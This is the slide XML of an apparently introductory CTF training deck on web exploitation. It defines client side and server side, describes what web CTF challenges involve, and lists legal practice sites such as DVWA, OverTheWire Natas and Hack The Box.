            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://xss-quiz.int21h.jp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> – Mostly DOM XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://github.com/digininja/DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> - A locally hosted vulnerable web application that contains practice on many kinds of web attacks, including XSS and CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://www.intigriti.com/hackademy/xss-challenges  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Intigriti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> XSS challenges (hard)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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13"/>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14"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="819301" y="524291"/>
            <a:ext cx="10585095" cy="520900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405144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B5E059-5994-DBF7-AC04-B767191E9B5D}"/>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1D002C8-CC40-FE0D-6F22-238967E65159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83819" y="1045191"/>
            <a:ext cx="12024361" cy="4578176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Other places to practice web:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://webhacking.kr/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://overthewire.org/wargames/natas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://app.hackthebox.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E373E-2B45-DD01-4EC1-69D14129ED2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-52426" y="6698054"/>
            <a:ext cx="12296852" cy="166519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74EDE1B2-AA06-4838-05EB-AC57A1D6F4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="819301" y="524291"/>
            <a:ext cx="10585095" cy="520900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424833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5" y="488435"/>
            <a:ext cx="7223535" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2FE21"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Web exploitation - introduction</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="4000" spc="120" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2FE21"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1039E69-1911-E1CA-7F9F-70B57027F657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2331720" y="2157881"/>
            <a:ext cx="6684264" cy="3102131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272B"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>are vulnerabilities fundamental to the internet that show up regardless of the chosen technology.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>In CTFs, the usual form of a web challenge is one where players are given a link to a website (and sometimes it’s source code) and have to find a flaw in the website’s design, exploit it and retrieve the flag.</a:t>
            </a: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53304"/>
            <a:ext cx="6097218" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="30">
                <a:solidFill>
                  <a:srgbClr val="24272B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Handjet Square Single" pitchFamily="2" charset="0"/>
                <a:cs typeface="Handjet Square Single" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Web exploitation - introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" spc="30" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Handjet Square Single" pitchFamily="2" charset="0"/>
              <a:cs typeface="Handjet Square Single" pitchFamily="2" charset="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23058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4" y="587727"/>
            <a:ext cx="7449961" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2FE21"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Client side VS server side</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2FE21"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRP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81880"/>
            <a:ext cx="6097218" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Client side VS server side</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" sz="1000" dirty="0">
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>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
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE50445-BA81-4784-8962-C7594FBD9F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453896" y="2129716"/>
            <a:ext cx="8513064" cy="2768707"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272B"/>
              </a:solidFill>
              <a:effectLst/>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b="1" dirty="0">
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Client side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> refers to everything that occurs within the user's browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>This includes rendering HTML and CSS, executing JavaScript, managing cookies and session data, handling user interactions, making requests to server and more.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205175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2427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rgbClr val="24272C"/>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87FF34-DF3A-239A-78FE-A64704203FFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="886794" y="587727"/>
            <a:ext cx="7449961" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E2FE21"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Client side VS server side</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E2FE21"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF7FC9B7-76F8-4846-6AE9-F8E9111011E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292971" y="6381880"/>
            <a:ext cx="6097218" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Client side VS server side</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" sz="1000" dirty="0">
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40257554-5D62-32A1-BCAC-40F227667627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8819329" y="6366654"/>
            <a:ext cx="3079700" cy="243717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE50445-BA81-4784-8962-C7594FBD9F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1654632" y="2079011"/>
            <a:ext cx="8185709" cy="2768707"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272B"/>
              </a:solidFill>
              <a:effectLst/>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b="1" dirty="0">
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Server side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>refers to the backend server which the front end sends/receives information to/from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
